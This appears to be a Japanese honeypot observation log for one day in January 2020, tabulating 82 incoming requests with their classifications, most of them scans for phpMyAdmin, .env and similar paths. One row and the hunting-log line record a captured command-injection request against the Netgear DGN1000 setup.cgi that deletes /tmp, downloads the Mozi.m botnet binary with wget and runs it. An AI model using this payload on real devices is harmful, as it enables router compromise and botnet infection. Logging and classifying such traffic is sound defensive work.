WOWHoneypot観察(304日目)
2020/01/14(火)
トータルは82件でした。
ハンティングログは以下です。
49.89.55[.]208 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
件数 | 概要 | リクエスト |
---|---|---|
48 | アクセス | GET / |
9 | 調査 | GET /script |
4 | アクセス | GET /favicon.ico |
3 | クローリング | GET /robots.txt |
1 | 調査 | OPTIONS / |
1 | Jenkinsの調査 | GET /view/all/builds |
1 | サイト構成の調査 | GET /sitemap.xml |
1 | DGN1000 Netgear ルータの脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
1 | Yealinkの調査? | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
1 | phpMyAdminの調査 | GET /muieblackcat |
1 | phpMyAdminの調査 | GET /phpmyadmin//index.php |
1 | phpMyAdminの調査 | GET //pma/scripts/setup.php |
1 | phpMyAdminの調査 | GET //phpmyadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //phpMyAdmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //myadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //index.php |
1 | phpMyAdminの調査 | GET //MyAdmin/scripts/setup.php |
1 | テストファイルち調査 | GET //cgi-bin/test-cgi |
1 | 環境設定の調査 | GET //cgi-bin/env.sh |
1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
1 | 環境設定の調査 | GET /.env |
1 | 不正中継の試み | CONNECT ip.ws.126.net:443 |